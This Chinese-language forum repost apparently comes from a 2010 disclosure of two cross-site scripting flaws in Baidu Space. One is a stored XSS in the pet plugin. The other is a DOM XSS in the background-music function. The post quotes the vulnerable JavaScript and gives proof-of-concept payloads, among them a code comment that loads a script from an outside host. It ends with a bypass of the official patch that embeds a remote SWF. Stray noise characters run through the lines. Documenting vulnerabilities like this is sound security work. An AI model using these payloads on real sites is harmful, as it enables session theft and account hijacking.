百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS. 9 C* Y; w8 u0 G6 {
$ O3 s$ L5 [ O% h; U, y) w1 L1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存.
' g5 H' J: G9 o2.在http://hi.baidu.com/ui/scripts/pet/pet.js中 5 Y8 O( U V( o. T8 Y1 h: A
4 R* G: H" N" h/ s9 F将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p>
5 m7 b9 v( E0 s3 S$ D5 G+ B ^其中BdUtil.insertWBR为
- v* j( }# ?3 {$ b. Kfunction(text, step) { 3 M/ L3 K+ x) j7 O8 y3 [% f) H
var textarea = textAreaCache || getContainer();
/ g) a& e3 U" @) M if (!textarea) { 9 Q7 I# `: X0 M
return text;
) u6 q; @) i; z* H } 5 C' E' c) S4 K& r; L. h
textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">"); 6 e. b7 e9 a1 C) t
var string = textarea.value;
9 h/ A( Q0 t' L: Q var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");
$ `7 A( |$ `: E! @1 [; s var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;"); 5 O% N! G5 \' ]) L+ L7 R+ o
return result;
2 @! ~$ I: @4 L2 L: I& P} ( {# C; A: Q% z$ d
在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS.
; n) d; C# T: A3 y/ T9 [测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)> + Z6 g# o: R% F/ _( \. b( ?( R
: l) ]; x) e) H$ T9 `1 W* @二:creatbgmusic() Dom-Xss Bug
4 r6 g% R: f( V- l百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞
9 m' \! S* ?% r. n, D. j3 I7 U% m0 e7 B B" ^) w: ?* W
在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码:
8 Q0 F5 |! Z% z: Q
% f* m. B* Y f: ?: qfunction creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) {
; X- m0 `6 @; b L //传入的murl赋值到bgmusic1和bgmusic2中
( m0 y) c. s; h //可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1 & l) U& d( h$ v
var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">";
8 {# `: N0 M8 s, N J. q) f5 x if (musicnum <= 1) {
: H' H( f* Z$ K9 l6 f bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">"; % K7 M9 E5 Z" x- l0 _
} 7 @% C1 F# L% N1 o
bgmusic1 += "</OBJECT>"; 7 a# p, H& O9 @3 \8 v4 a
var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\""; % }0 s) b$ I" c) x s9 P/ \/ j
if (musicnum <= 1) {
. M- s/ T: ?3 w4 K) I bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" ";
- y v: T' i2 V. F: @4 Y& f } ! [4 e& L' S/ l) J
bgmusic2 += "> </EMBED>";
# D1 n- p6 X. I5 b& w var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>"; f: U0 n3 M8 G3 \; v
var bgmus = detectWMP(); 2 ]" X& [" i- y$ v' Y5 X4 {+ U
if (functype == "FckMusicHelper") {
o% ?6 v5 v6 E$ u, W if (bgmus.installed) {
. D6 T) M8 R( R$ L( j! y# i if (bgmus.type == "IE") { 7 t& M7 @ @8 E3 h, l8 C \
return bgmusic1;
, l+ b+ u" v7 l/ b* k( t' P; [& X } else if (bgmus.type == "NS") {
% R u( B* e' Y return bgmusic2; % k' d! `( Y4 v9 }3 I, a
} ! c% ?/ D" B0 C) }7 c
} else {
9 g W/ @- @' \& }, ? return bgmusic3; ; b' u& N. }0 i+ h# d8 `3 U$ T
}
6 d$ g* Q1 ~& R _4 X" U# z } else { ' Q' L. ]' ?/ ^0 t$ @
if (bgmus.installed) { : |# ^' b8 {+ S R1 S E; T* N* l
//document.write 直接输出bgmusic变量 导致xss
% B0 I% n2 h! F/ {% V if (bgmus.type == "IE") {
4 E" F8 v: m4 f0 F, x: M document.write(bgmusic1);
0 c, M; ?* O) H& p1 D* o0 [ } else if (bgmus.type == "NS") { % B$ `% \; |" @
document.write(bgmusic2);
8 i. }0 w& P" \& @: |2 R7 Q$ w }
, ] ~/ i/ ?; K. @- P- G8 ^ } else {
2 Q* R) @* _: f: ^; ~1 b$ K' M* U document.write(bgmusic3); , U3 S% X9 Y6 w* @3 k
} ; I1 D8 w1 x% a; H% M$ W+ a: R
return "";
1 m2 ^$ [1 ^/ e } & c: p% o+ Y0 S6 M) H- @
} ( |6 x+ _8 W$ X+ w' w
. R6 L, M* W; w. K在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下: a! `$ `$ {# J1 ~
) j% T$ b( c% c* P/ Wfunction initBlogTextForFCK(){
+ `2 d) }/ p8 i. \5 r* K//fck init music ( v% ~" V& t7 }6 G' n
if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}}
. b' V4 X% L( O2 l- q$ M- ]var imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组
2 ~4 t& G/ P& Pvar isAutoPlay=true;
( n8 g4 @1 }& Y1 d6 k! B9 @for(var i=0,n=imgBox.length;i<n;i++){ //然后遍历. 5 |7 y" q% {( a
var img=imgBox; 2 W! K0 E- P _. |, S$ g$ G
if(img.getAttribute(’rel’)){
- \, T; g7 h5 |* V1 i; j x5 u" e var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc
; Y9 ^8 V9 v1 t' T; g& B5 H- Y var musicDiv = document.createElement("SPAN");
% F# i6 @4 F/ F* k var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp] $ \ o% G6 o6 \/ k
: \& |( e; e @( ]4 M% Q
..........................
: b* O. [1 @# r% l : ]% _5 M c4 T
//直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来.
3 H* u0 J9 g* `# f' E var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
! v5 }2 V+ B& T: ~# K; Z shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv);
2 d7 F4 L$ }% C7 ]. X% m" B) K musicDiv.innerHTML=shtml;
' z" z8 Q7 @% y, K i--;n--;
/ y- h7 ?4 l y" E } % C* H, B* \1 q
} ) q8 s2 O, A+ X" p3 m0 s# V: N
( |1 j3 Y. w3 @
从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS. - I2 S5 x# l% f9 L8 J# o5 D
6 ^( G. z- c( H( F# [: v. W1 {
测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/> 2 N* B2 V& M F3 P/ i. n
: u3 @4 T- g/ O( m
等待官方补丁 ! N2 t/ H- J; R; k# M
6 L/ I6 i7 ]: I/ ~: l# `
update 2010年5月13日
+ u: u( V3 V8 N8 O8 X) u) F
% p: ?/ }7 O' o8 O官方补丁:
/ c3 u; f" L3 I1 c! O) W2 i6 ~" x: [+ E+ ~) i9 F+ ~
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); - S4 { O/ L: T; U
改为:
, F3 X9 v$ h1 {9 f6 Ovar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’); ( a- c8 A+ p c/ T! @& r2 V4 y D; d
H- n: m3 h. g. m7 |, j" hupdate 2010年5月13日 21:50:37 ) c7 ]9 o' d6 j) _. V2 t E+ q- u( d
& ^# g4 s, R, [: @( V
补丁存在漏洞 没有过滤" 可以继续跨:
- d# o3 y. e& H
' P4 d( [* \) b1 E3 o0 a- t8 ]NEW POC: ' x; L0 Y. r( B2 W: Y4 l9 \) s
5 E6 p. o) o% F- T g5 M4 _0 }<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf" ) X: U7 H9 A8 d* f
/ h( N# c4 G6 Uallowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>+ x! a, f# X! K& }
: ^- [7 v. e8 ~4 z4 n3 x9 z
|
发表于 2013-8-24 11:51:11
收藏
支持
反对